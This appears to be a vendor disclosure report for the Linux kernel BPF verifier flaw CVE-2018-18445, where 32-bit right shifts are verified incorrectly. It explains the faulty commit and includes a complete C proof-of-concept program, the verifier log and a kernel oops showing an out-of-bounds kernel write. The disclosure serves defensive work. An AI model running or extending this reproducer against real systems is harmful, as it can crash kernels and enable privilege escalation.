Linux: bpf verifier: 32-bit RSH verification doesn't truncate input before the ALU op CVE-2018-18445 When I wrote commit 468f6eafa6c4 ("bpf: fix 32-bit ALU op verification"), I screwed up and assumed that, in order to emulate 32-bit arithmetic with 64-bit logic, it is sufficient to just truncate the output to 32 bits; and so I just moved the register size coercion that used to be at the start of the function to the end of the function. That assumption is true for almost every op, but not for 32-bit right shifts, because those can propagate information towards the least significant bit. Repro: user@debian:~/bpf_rsh32$ cat test.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ 
.off = 0, \ .imm = IMM }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_LD_ABS(SIZE, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int array_create(int value_size, int num_entries) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = value_size, .max_entries = num_entries }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); return mapfd; } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = 
BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; printf("==========================\n%s==========================\n", verifier_log); errno = errno_; if (progfd == -1) err(1, "prog load"); return progfd; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); // hook eBPF program up to a socket // sendmsg() to the socket will trigger the filter // returning 0 in the filter should toss the packet int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks[1]; } void trigger_proc(int sockfd) { if (write(sockfd, "X", 1) != 1) err(1, "write to proc socket failed"); } int main(void) { int small_map = array_create(8, 1); struct bpf_insn insns[] = { BPF_MOV64_IMM(BPF_REG_8, 2), BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 31), BPF_ALU32_IMM(BPF_RSH, BPF_REG_8, 31), BPF_ALU32_IMM(BPF_SUB, BPF_REG_8, 2), // store r8 into map BPF_LD_MAP_FD(BPF_REG_ARG1, small_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4), BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); trigger_proc(sock_fd); } user@debian:~/bpf_rsh32$ gcc -o test test.c user@debian:~/bpf_rsh32$ ./test ========================== func#0 @0 0: R1=ctx(id=0,off=0,imm=0) R10=fp0,call_-1 0: (b7) r8 = 2 1: R1=ctx(id=0,off=0,imm=0) R8_w=inv2 R10=fp0,call_-1 1: (67) r8 <<= 31 2: R1=ctx(id=0,off=0,imm=0) 
R8_w=inv4294967296 R10=fp0,call_-1 2: (74) (u32) r8 >>= (u32) 31 3: R1=ctx(id=0,off=0,imm=0) R8_w=inv2 R10=fp0,call_-1 3: (14) (u32) r8 -= (u32) 2 4: R1=ctx(id=0,off=0,imm=0) R8_w=inv0 R10=fp0,call_-1 4: (18) r1 = 0x0 6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R8_w=inv0 R10=fp0,call_-1 6: (bf) r2 = r10 7: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp0,call_-1 R8_w=inv0 R10=fp0,call_-1 7: (07) r2 += -4 8: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp-4,call_-1 R8_w=inv0 R10=fp0,call_-1 8: (62) *(u32 *)(r2 +0) = 0 9: R1_w=map_ptr(id=0,off=0,ks=4,vs=8) R2_w=fp-4,call_-1 R8_w=inv0 R10=fp0,call_-1 9: (85) call bpf_map_lookup_elem#1 10: R0=map_value_or_null(id=1,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 10: (55) if r0 != 0x0 goto pc+1 R0=inv0 R8=inv0 R10=fp0,call_-1 11: R0=inv0 R8=inv0 R10=fp0,call_-1 11: (95) exit 12: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 12: (0f) r0 += r8 13: R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 13: (7b) *(u64 *)(r0 +0) = r8 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 14: R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R8=inv0 R10=fp0,call_-1 14: (b7) r0 = 0 15: R0_w=inv0 R8=inv0 R10=fp0,call_-1 15: (95) exit processed 15 insns (limit 131072), stack depth 4 ========================== Killed user@debian:~/bpf_rsh32$ sudo dmesg | grep -A100 BUG: [ 104.700036] BUG: unable to handle kernel paging request at ffff972ca86232ce [ 104.703975] PGD 149001067 P4D 149001067 PUD 0 [ 104.706411] Oops: 0002 [#1] SMP [ 104.708172] CPU: 6 PID: 1167 Comm: test Not tainted 4.19.0-rc6+ #180 [ 104.710720] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 104.713162] RIP: 0010:___bpf_prog_run+0xeb/0xee0 [ 104.714521] Code: 89 0c 10 e9 52 ff ff ff 0f b6 43 01 48 83 c3 08 89 c2 83 e0 0f c0 ea 04 48 8b 44 c5 00 0f b6 d2 48 8b 4c d5 00 48 0f bf 53 fa <48> 89 0c 10 e9 27 ff ff ff 0f b6 43 01 48 0f bf 4b 02 48 83 c3 08 [ 104.719997] RSP: 0018:ffffbc428207bc30 EFLAGS: 00010a02 [ 
104.721535] RAX: ffff972ca86232ce RBX: ffffbc42817590a8 RCX: 00000000fffffffe [ 104.723675] RDX: 0000000000000000 RSI: 000000000000007b RDI: ffff972ba8623200 [ 104.725735] RBP: ffffbc428207bc78 R08: ffffffffbb14a180 R09: ffff972baa1c6700 [ 104.727799] R10: ffff972ba9220c00 R11: ffff972baa1c6700 R12: 0000000000000000 [ 104.729848] R13: ffffffffbc439340 R14: ffff972ba5b63400 R15: ffffbc428207bde0 [ 104.731915] FS: 00007f7352228700(0000) GS:ffff972bb3d80000(0000) knlGS:0000000000000000 [ 104.734647] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 104.736304] CR2: ffff972ca86232ce CR3: 00000002255c8001 CR4: 00000000003606e0 [ 104.738347] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 104.740411] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 104.742470] Call Trace: [ 104.743221] ? __bpf_prog_run32+0x33/0x50 [ 104.744423] ? alloc_skb_with_frags+0x64/0x1c0 [ 104.745700] ? wait_woken+0x80/0x80 [ 104.746716] ? apparmor_cred_alloc_blank+0x10/0x10 [ 104.748109] ? sk_filter_trim_cap+0x83/0x1b0 [ 104.749340] ? wait_for_unix_gc+0x34/0xb0 [ 104.750512] ? unix_dgram_sendmsg+0x20b/0x700 [ 104.751800] ? sock_sendmsg+0x36/0x40 [ 104.752879] ? sock_write_iter+0x8f/0xf0 [ 104.754036] ? __vfs_write+0x112/0x1a0 [ 104.755128] ? vfs_write+0xad/0x1a0 [ 104.756148] ? ksys_write+0x52/0xc0 [ 104.757120] ? do_syscall_64+0x55/0x110 [ 104.758237] ? 
entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 104.759766] Modules linked in: xor zstd_compress raid6_pq [ 104.761363] CR2: ffff972ca86232ce [ 104.762336] ---[ end trace 17bac53c51559623 ]--- [ 104.763674] RIP: 0010:___bpf_prog_run+0xeb/0xee0 [ 104.765013] Code: 89 0c 10 e9 52 ff ff ff 0f b6 43 01 48 83 c3 08 89 c2 83 e0 0f c0 ea 04 48 8b 44 c5 00 0f b6 d2 48 8b 4c d5 00 48 0f bf 53 fa <48> 89 0c 10 e9 27 ff ff ff 0f b6 43 01 48 0f bf 4b 02 48 83 c3 08 [ 104.770407] RSP: 0018:ffffbc428207bc30 EFLAGS: 00010a02 [ 104.772021] RAX: ffff972ca86232ce RBX: ffffbc42817590a8 RCX: 00000000fffffffe [ 104.772022] RDX: 0000000000000000 RSI: 000000000000007b RDI: ffff972ba8623200 [ 104.772023] RBP: ffffbc428207bc78 R08: ffffffffbb14a180 R09: ffff972baa1c6700 [ 104.772024] R10: ffff972ba9220c00 R11: ffff972baa1c6700 R12: 0000000000000000 [ 104.772024] R13: ffffffffbc439340 R14: ffff972ba5b63400 R15: ffffbc428207bde0 [ 104.772026] FS: 00007f7352228700(0000) GS:ffff972bb3d80000(0000) knlGS:0000000000000000 [ 104.772027] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 104.772027] CR2: ffff972ca86232ce CR3: 00000002255c8001 CR4: 00000000003606e0 [ 104.772030] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 104.772031] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh